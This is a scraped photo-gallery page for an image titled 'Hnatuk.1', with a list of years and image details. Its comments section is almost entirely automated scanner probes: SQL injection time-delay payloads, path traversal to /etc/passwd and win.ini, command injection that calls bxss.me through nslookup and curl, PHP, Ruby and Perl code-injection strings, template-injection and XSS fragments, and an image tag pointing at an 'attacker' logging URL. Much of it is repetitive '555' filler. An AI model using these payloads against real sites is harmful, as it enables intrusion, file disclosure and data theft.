Hnatuk.1
1895
1895
1896
1896
1897
1897
1898
1898
1899
1899
1901
1901
1902
1902
1903
1903
1904
1904
1905
1905
1906
1906
1919
1919
1923
1923
1924
1924
1930
1930
1931
1931
1932
1932
1933
1933
1944
1944
1945
1945
1946
1946
1947
1947
1957
1957
1958
1958
1959
1959
2007
2007
2008
2008
2028
2028
2029
2029
2030
2030
2031
2031
2032
2032
2033
2033
2034
2034
2035
2035
2036
2036
2037
2037
2038
2038
2039
2039
2040
2040
2041
2041
2042
2042
2043
2043
2044
2044
2045
2045
2052
2052
2053
2053
2055
2055
2056
2056
2057
2057
2058
2058
2059
2059
Image information
Filesize
48.16 KB (263 x 400 px)
Image Rating
Send to Friend
Please login first...
Comments for this image
555
555
1GK9BF767XZ0
555
555
555
555
555
555
555
555
)
555
!(()&&!|*|*|
^(#$!@#$)(()))******
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555'&&sleep(27*1000)*byycbt&&'
555
555"&&sleep(27*1000)*oxirxp&&"
../../../../../../../../../../../../../.- ./etc/passwd
555'||sleep(27*1000)*csriyt||'
../../../../../../../../../../../../../.- ./windows/win.ini
555"||sleep(27*1000)*hlatms||"
file:///etc/passwd
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
12345'"'");|]* {
''?
555
555
555
555
555
555
555
555
555
555
${10000355+9999311}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
"+"A".concat(70-3).concat(22*4).concat(9- 9).concat(78).concat(118).concat(90)+(re- quire"socket"
Socket.gethostbyname("hitvk"+"ywgaezn- g29128.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
555
'+'A'.concat(70-3).concat(22*4).concat(1- 17).concat(69).concat(121).concat(88)+(r- equire'socket'
Socket.gethostbyname('hitjj'+'utiucuo- w756ff.bxss.me.')[3].to_s)+'
555
555
'A'.concat(70-3).concat(22*4).concat(106- ).concat(68).concat(106).concat(79)+(req- uire'socket'
Socket.gethostbyname('hitqg'+'uikxecg- ga3f9e.bxss.me.')[3].to_s)
555
555
555
555
555
555
echo dfviyl$() spwslo
z^xyu||a #' &echo dfviyl$() spwslo
z^xyu||a #|" &echo dfviyl$() spwslo
z^xyu||a #
555
555
&echo fetuve$() urgwpc
z^xyu||a #' &echo fetuve$() urgwpc
z^xyu||a #|" &echo fetuve$() urgwpc
z^xyu||a #
555
555
555
555
555
555&echo hpwojz$() vcilma
z^xyu||a #' &echo hpwojz$() vcilma
z^xyu||a #|" &echo hpwojz$() vcilma
z^xyu||a #
555
555
|echo wsswmo$() zkdakg
z^xyu||a #' |echo wsswmo$() zkdakg
z^xyu||a #|" |echo wsswmo$() zkdakg
z^xyu||a #
555
555
555
555|echo nuvnap$() irbynd
z^xyu||a #' |echo nuvnap$() irbynd
z^xyu||a #|" |echo nuvnap$() irbynd
z^xyu||a #
555
555
expr 9000117731 - 957525
555
555
(nslookup -q=cname hiteysaqkhjhm6ec31.bxss.me||curl hiteysaqkhjhm6ec31.bxss.me))
;assert(base64_decode('cHJpbnQobWQ1KDMxM- zM3KSk7'));
555
555
$(nslookup -q=cname hitbiwdetuzvgf1c15.bxss.me||curl hitbiwdetuzvgf1c15.bxss.me)
';print(md5(31337));$a='
555
555
&nslookup -q=cname hitnpyyrawkbg3ba5f.bxss.me&'"`0&nslookup -q=cname hitnpyyrawkbg3ba5f.bxss.me&`'
";print(md5(31337));$a="
http://dicrpdbjmemujemfyopp.zzz/yrphmgdp- gulaszriylqiipemefmacafkxycjaxjs?.jpg
photohnatyuk
&(nslookup -q=cname hitwdpyvdiodx249cf.bxss.me||curl hitwdpyvdiodx249cf.bxss.me)&'"`0&(nslook- up -q=cname hitwdpyvdiodx249cf.bxss.me||curl hitwdpyvdiodx249cf.bxss.me)&`'
1yrphmgdpgulaszriylqiipemefmacafkxycjaxj- s .jpg
photohnatyuk
555
|(nslookup -q=cname hitispsaebopc4a9f3.bxss.me||curl hitispsaebopc4a9f3.bxss.me)
${@print(md5(31337))}
/etc/shells
photohnatyuk/.
`(nslookup -q=cname hitrciyxwlbnz52372.bxss.me||curl hitrciyxwlbnz52372.bxss.me)`
${@print(md5(31337))}
../../../../../../../../../../../../../.- ./etc/shells
555
555
555
;(nslookup -q=cname hitedzlvkjmdu1dc54.bxss.me||curl hitedzlvkjmdu1dc54.bxss.me)|(nslookup -q=cname hitedzlvkjmdu1dc54.bxss.me||curl hitedzlvkjmdu1dc54.bxss.me)&(nslookup -q=cname hitedzlvkjmdu1dc54.bxss.me||curl hitedzlvkjmdu1dc54.bxss.me)
c:/windows/win.ini
555
'.print(md5(31337)).'
555
555
bxss.me
|(nslookup${IFS}-q${IFS}cname${IFS}hitdx- pnbkvxhl78f14.bxss.me||curl${IFS}hitdxpn- bkvxhl78f14.bxss.me)
'.gethostbyname(lc('hitjp'.'zfjyiawp30d2- 9.bxss.me.')).'A'.chr(67).chr(hex('58'))- .chr(100).chr(79).chr(98).chr(82).'
555
Http://bxss.me/t/fit.txt
".gethostbyname(lc("hitvc"."krqboguq84a3- f.bxss.me."))."A".chr(67).chr(hex("58"))- .chr(111).chr(89).chr(101).chr(69)."
'"
555
555
http://bxss.me/t/fit.txt?.jpg
!--
&(nslookup${IFS}-q${IFS}cname${IFS}hitxw- wfdevtdc6ae5a.bxss.me||curl${IFS}hitxwwf- devtdc6ae5a.bxss.me)&'"`0&(nslookup${IFS- }-q${IFS}cname${IFS}hitxwwfdevtdc6ae5a.b- xss.me||curl${IFS}hitxwwfdevtdc6ae5a.bxs- s.me)&`'
555
555
gethostbyname(lc('hitfj'.'gptnrdqr9bcb7.- bxss.me.')).'A'.chr(67).chr(hex('58')).c- hr(113).chr(82).chr(121).chr(88)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9572403*9179334)
555
'+response.write(9572403*9179334)+'
555
555
"+response.write(9572403*9179334)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%oGx5(9428)
555
'"()&%oGx5(9828)
5559658562
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555qlPLShRT
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or '0zLTl3mV'='
-1" OR 5*5=25 or "fLr4hs4E"="
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15- ),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15- ),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(- select(0)from(select(sleep(15)))v)+'"+(s- elect(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
5554WMevrp1'; waitfor delay '0:0:15' --
555-1 OR 785=(SELECT 785 FROM PG_SLEEP(15))--
555-1) OR 886=(SELECT 886 FROM PG_SLEEP(15))--
555-1)) OR 654=(SELECT 654 FROM PG_SLEEP(15))--
555n0MRoMxA' OR 736=(SELECT 736 FROM PG_SLEEP(15))--
555rAMtyzzs') OR 467=(SELECT 467 FROM PG_SLEEP(15))--
5558f3RIxSc')) OR 878=(SELECT 878 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||C- HR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)|- |CHR(98)||CHR(98),15)||'
555
555'"
555%2527%2522'"
@@57zxi
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%upPV(9299)
555
'"()&%upPV(9505)
555
5559416523
555
bfg6619<s1﹥s2ʺs3ʹhjl6619
bfgx1012z1z2abcxhjl1012
555
555
th:t="${dfb}#foreach"
555
555
1}}"}}'}}1%>"%>'%>
555
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z- ","o")
555upPV(9437)
555
5555V2SD[!+!]
555
555upPV(9111)
555
555upPV(9096)9096
555
555ScRIpT>upPV(9640)/sCrIpT>
555
555upPV(9135)
555
555
555
555upPV(9685)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%75%- 70%50%56%289268%29%3C%2F%73%43%72%69%70%- 54%3E
555u003CScRiPtupPV(9655)u003C/sCripTu003- E
555
555
555upPV(9704)
555
555
555
555
555
555}body{zzz:Expre/**/SSion(upPV(9650))}
555
555H6fie
upPV(9613)
555
555CUP0G[!+!]
555
555
555
555
555
555img sRc='http://attacker-9882/log.php?'
555aTJcSbm